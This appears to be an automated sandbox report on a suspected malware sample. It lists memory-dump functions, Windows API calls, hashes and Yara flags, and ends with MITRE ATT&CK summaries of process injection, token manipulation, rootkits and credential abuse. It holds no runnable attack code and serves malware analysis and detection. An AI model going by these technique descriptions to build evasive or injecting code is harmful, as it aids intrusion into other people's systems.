Instruction Fuzzy Hash: 0590027131100413F11261594909B07000D97D0687F91D452A0415558D9696D962F161

Uniqueness

Uniqueness Score: -1.00%

Function 04E29840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E2984A

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f267a6108a18f7eaebbbb266f8161b40319f70e56e55c7cbc8b38cd72f2bd77
Instruction ID: 0122a4822c1cf83c5fe6e867432d9ab5416104d75f0ce940ddb6be0c46be48a0
Opcode Fuzzy Hash: 7f267a6108a18f7eaebbbb266f8161b40319f70e56e55c7cbc8b38cd72f2bd77
Instruction Fuzzy Hash: BD900261352041527546B1594809907400AA7E0687B91D052A1405950C8566E866E661

Uniqueness

Uniqueness Score: -1.00%

Function 04E295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E295DA

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c40ea96a054085c5da5959179c638b122871dd5282c5cab52810784d62c385ae
Instruction ID: 38b0ec92a9b5d935049b38dd328687016569ea95aed8194116e7295d62500073
Opcode Fuzzy Hash: c40ea96a054085c5da5959179c638b122871dd5282c5cab52810784d62c385ae
Instruction Fuzzy Hash: C49002A131200003610671594819A16400E97E0647F51D061E1005590DC565D8A1B165

Uniqueness

Uniqueness Score: -1.00%

Function 04E299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E299AA

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b045e163b9acd56da4d30131e3e5f8cf136d1e82b0b8457cd40e79ca179e7e38
Instruction ID: c36399a55fae6cd4c39d947b6f60e38840a541423f1b9db15e174dff4ee55562
Opcode Fuzzy Hash: b045e163b9acd56da4d30131e3e5f8cf136d1e82b0b8457cd40e79ca179e7e38
Instruction Fuzzy Hash: 519002A135100442F10161594819F060009D7E1747F51D055E1055554D8659DC62B166

Uniqueness

Uniqueness Score: -1.00%

Function 04E29540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E2954A

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f32aaa46470be281e504f2c331a9e01b4f409a4fc98a1bc9eca7b8312a2fda7f
Instruction ID: 7adea39b9eb571533cc8ac9c1606e451e9e741815d1ef5f833673d85a2e289b2
Opcode Fuzzy Hash: f32aaa46470be281e504f2c331a9e01b4f409a4fc98a1bc9eca7b8312a2fda7f
Instruction Fuzzy Hash: A3900265321000032106A5590B09907004A97D5797751D061F1006550CD661D871A161

Uniqueness

Uniqueness Score: -1.00%

Function 04E29910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E2991A

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a7f1742abf70471c250dfa8487874fff72d3fe85c05fa309a4ec07f417f13f15
Instruction ID: db55811c12811123219d3a54283010df0cb6f3941bb1f6be645988901ac808a8
Opcode Fuzzy Hash: a7f1742abf70471c250dfa8487874fff72d3fe85c05fa309a4ec07f417f13f15
Instruction Fuzzy Hash: BA9002B131100402F14171594809B46000997D0747F51D051A5055554E8699DDE5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 04E296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E296EA

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e39687cb017f52c31ff6679285d5fe3247abb4577540958005126c6f577b5746
Instruction ID: 0db86bc722370a057ca7c281e4f928851b9ff2d9cff01c24d2fda54119607a5d
Opcode Fuzzy Hash: e39687cb017f52c31ff6679285d5fe3247abb4577540958005126c6f577b5746
Instruction Fuzzy Hash: BC90027131108802F11161598809B4A000997D0747F55D451A4415658D86D5D8A1B161

Uniqueness

Uniqueness Score: -1.00%

Function 04E296D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E296DA

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24421a5751cea6e558ff63e64a80bd6cd922c6cf7bf0718246fa9633b6ad2505
Instruction ID: fa3bc3f48ec474d48ea12b0769e19be8ee108fb8c3c3a50f49f1402cb9265561
Opcode Fuzzy Hash: 24421a5751cea6e558ff63e64a80bd6cd922c6cf7bf0718246fa9633b6ad2505
Instruction Fuzzy Hash: 1A90027131100842F10161594809F46000997E0747F51D056A0115654D8655D861B561

Uniqueness

Uniqueness Score: -1.00%

Function 04E29660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E2966A

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c83e2b3eb652eda5101d4faf8cadecd846b94ba6cb2dc3f215e84140b5b6e8f
Instruction ID: f8aefed32e71ee4393d849975323de005199807235cd191e9da15b3118a28afa
Opcode Fuzzy Hash: 8c83e2b3eb652eda5101d4faf8cadecd846b94ba6cb2dc3f215e84140b5b6e8f
Instruction Fuzzy Hash: D790027131100802F18171594809A4A000997D1747F91D055A0016654DCA55DA69B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 04E29650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E2965A

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f75cd4c1b4135241c8c5d6fa481f98ed00d64115055b902fdc1766709059437
Instruction ID: 10a3b1ba820dcb80ce1afdc8d7344b3b8a7024e02e5b02a49d7129ab1b28982f
Opcode Fuzzy Hash: 3f75cd4c1b4135241c8c5d6fa481f98ed00d64115055b902fdc1766709059437
Instruction Fuzzy Hash: 6590027131504842F14171594809E46001997D074BF51D051A0055694D9665DD65F6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04E29A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E29A5A

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 41b04bf8dac6fa9cc44e983102c2c25ff346a453593b7ae7a8b8e31a337b79fd
Instruction ID: 558872866d7eaa7e6c0e6d56996e579588a81c0931ba1c298c3c9ea01aae5f57
Opcode Fuzzy Hash: 41b04bf8dac6fa9cc44e983102c2c25ff346a453593b7ae7a8b8e31a337b79fd
Instruction Fuzzy Hash: 8790026132180042F20165694C19F07000997D0747F51D155A0145554CC955D871A561

Uniqueness

Uniqueness Score: -1.00%

Function 04E29FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E29FEA

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f176be464bd3646b46a9c277f8953db68c4ef619ac1d0d4f307bc9717476100
Instruction ID: 283b19dbf1953377a25607198760aeb370d52d8eacb7beab75d9b5bba5df9365
Opcode Fuzzy Hash: 6f176be464bd3646b46a9c277f8953db68c4ef619ac1d0d4f307bc9717476100
Instruction Fuzzy Hash: F490027132114402F11161598809B06000997D1647F51D451A0815558D86D5D8A1B162

Uniqueness

Uniqueness Score: -1.00%

Function 04E29780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E2978A

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3159de02f11c56fd11657ea9bd2cb5688fa28d55c9f82ce13f7a6bfee8c8fe22
Instruction ID: 254bdca67642616a356a71fb4dfbe7b84e3fa6cd7be428df16e158722be0c142
Opcode Fuzzy Hash: 3159de02f11c56fd11657ea9bd2cb5688fa28d55c9f82ce13f7a6bfee8c8fe22
Instruction Fuzzy Hash: BC90026932300002F1817159580DA0A000997D1647F91E455A0006558CC955D879A361

Uniqueness

Uniqueness Score: -1.00%

Function 04E29710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E2971A

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9faf0da88fd1fddbb810ae963b1f8cbb8259d06be9587b79ec81e22e22df72bb
Instruction ID: e8270de9565d25ac3f418a63e9bacb407d66733431e1f67678ecccbcc2bcf31a
Opcode Fuzzy Hash: 9faf0da88fd1fddbb810ae963b1f8cbb8259d06be9587b79ec81e22e22df72bb
Instruction Fuzzy Hash: 1190027131100402F1016599580DA46000997E0747F51E051A5015555EC6A5D8A1B171

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA069, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00EC3AF8), ref: 00EDA09D

Strings

.z`, xrefs: 00EDA08C, 00EDA098

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 035705fb713529143faa7298760893f3409cc2520eea19be97e2496a14905d83
Instruction ID: be3c93c78a62c62b52bfa4535007e64f5ed93b2166c054f21660a78a1417130b
Opcode Fuzzy Hash: 035705fb713529143faa7298760893f3409cc2520eea19be97e2496a14905d83
Instruction Fuzzy Hash: 4BE06D712002046BD714DF54CC84EA777ACEF89610F058554B94857242C630E9108BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00EC3AF8), ref: 00EDA09D

Strings

.z`, xrefs: 00EDA08C, 00EDA098

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 132ad39a993ed151a7008ee70dbe27420bca5c8e68d5038455a07b6e006ebfc2
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: E5E04FB12002086BD714DF59DC45EA777ACEF88750F058555FD0867341C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00EC82EA, Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00EC834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00EC836B

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: bfe67b6ecb5fbd18be35f6894dd5178036d844c2eead9a875a44bac1cac2aa21
Instruction ID: cedfe15c8c43208fd218512c78c839aed8287e017476794344ee095a97bf1c50
Opcode Fuzzy Hash: bfe67b6ecb5fbd18be35f6894dd5178036d844c2eead9a875a44bac1cac2aa21
Instruction Fuzzy Hash: 9A014C31A402187AEB20A6949E43FFE776CAB00F55F040019FF04BA1C1D6A5290743E5

Uniqueness

Uniqueness Score: -1.00%

Function 00EC82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00EC834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00EC836B

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction ID: b3b894b7aead3edd9d41fa968f14b3f3700b5f408680b93ce9acfbc13ee3cdfe
Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction Fuzzy Hash: 6201F731A8022C7BE720A6989E43FFE776CAB00F55F040019FF04BA1C1E6D5690742F6

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA0A4, Relevance: 1.6, APIs: 1, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00EDA134

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 007a949610160cdf5e412536fa7d56fb401e089b02d1321ed466605672a53891
Instruction ID: 4c7569d98a8676f6176e32c26678d69a37dc6466c9e62991212820446fdad7b5
Opcode Fuzzy Hash: 007a949610160cdf5e412536fa7d56fb401e089b02d1321ed466605672a53891
Instruction Fuzzy Hash: 4E011BB2205109AFCB14DF98D880DEB77A9EF8C754F158259BA4CA7301D630E9158BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00EDA134

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 041cb887d6a4a9016252178034e55c983379fe79ea67642bf0acef9a2947e022
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 6201AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA0DF, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00EDA134

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: f497bde5e983975b2f8647c71344713b189404eeeeda599071133b00268b416b
Instruction ID: 78c7676939242d0ecb287b9429bb17ac7d5e847b5834b07da21cbdab0055eb88
Opcode Fuzzy Hash: f497bde5e983975b2f8647c71344713b189404eeeeda599071133b00268b416b
Instruction Fuzzy Hash: 8D0199B2210108AFCB58CF99DC80EEB77A9AF8C754F158259BA0DA7251C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00ED4506,?,00ED4C7F,00ED4C7F,?,00ED4506,?,?,?,?,?,00000000,00000000,?), ref: 00EDA05D

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: a1cf5aaa019a3853836927b00ab30d856b78d8ec90972461185722cfa143faec
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 3FE012B1200208ABDB14EF99DC81EA777ACEF88650F158559BA086B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00ECF1A2,00ECF1A2,?,00000000,?,?), ref: 00EDA200

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 140f48b6c48079e30ac6f935396602e28b732c5540b641f2394b06feeaaeb93a
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 11E01AB12002086BDB10DF49DC85EE737ADEF89650F058165BA0867241C930E9118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00ECF697, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00EC8CF4,?), ref: 00ECF6CB

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 85d636029a4ee010e8574ab06188646d0d364b4e7eab614e71f0a9dbb9c163cd
Instruction ID: 0bd14e313406b1d4cc6cde55f3af135541527ee1e2a2d0cd1fed4e7361e5ebfb
Opcode Fuzzy Hash: 85d636029a4ee010e8574ab06188646d0d364b4e7eab614e71f0a9dbb9c163cd
Instruction Fuzzy Hash: 1CD02E716903083BE600AAB8DC03F223BCAAB06B54F090074FA89EA3C3D921E00240A9

Uniqueness

Uniqueness Score: -1.00%

Function 00ECF6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00EC8CF4,?), ref: 00ECF6CB

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: bfc56df7ceb6d2d2d97415a304ce2650d0f6d80358213eac070fb2e5f4140a0c
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: F0D0A7717903043BE610FAA4DC03F2633CDAB54B04F490074FA48EB3C3D960E4014165

Uniqueness

Uniqueness Score: -1.00%

Function 04E2967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E29694

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9097a951625c839a57c1e72e14a80bbac873670b5cb08bc19759c470da089cba
Instruction ID: 5b05adeebcbf4570f377032780f8d5f7541a2726b146eccb351121d147235082
Opcode Fuzzy Hash: 9097a951625c839a57c1e72e14a80bbac873670b5cb08bc19759c470da089cba
Instruction Fuzzy Hash: 84B09BB1A014D5C9F711D7604B0CB17794477D0746F16D461D1020641B477CD195F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04E7FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04E7FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04E2CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04E75720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04E75720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04e7fdda
0x04e7fde2
0x04e7fde5
0x04e7fdec
0x04e7fdfa
0x04e7fdff
0x04e7fe0a
0x04e7fe0f
0x04e7fe17
0x04e7fe1e
0x04e7fe19
0x04e7fe19
0x04e7fe19
0x04e7fe20
0x04e7fe21
0x04e7fe22
0x04e7fe25
0x04e7fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04E7FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04E7FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04E7FE01

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: c6bd4087d318ac080e86959310ab301a39c2595f2a3e20e51fa3d86ff0cb8035
Instruction ID: 79f772360d6ccc0781e542bc8e3c3a3147d6d4199ce160964162bebe390a3aef
Opcode Fuzzy Hash: c6bd4087d318ac080e86959310ab301a39c2595f2a3e20e51fa3d86ff0cb8035
Instruction Fuzzy Hash: 4AF0F032240601BFEA201B55DC02F33BB6AEF84730F240314F628565E1EAA2F82097F5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

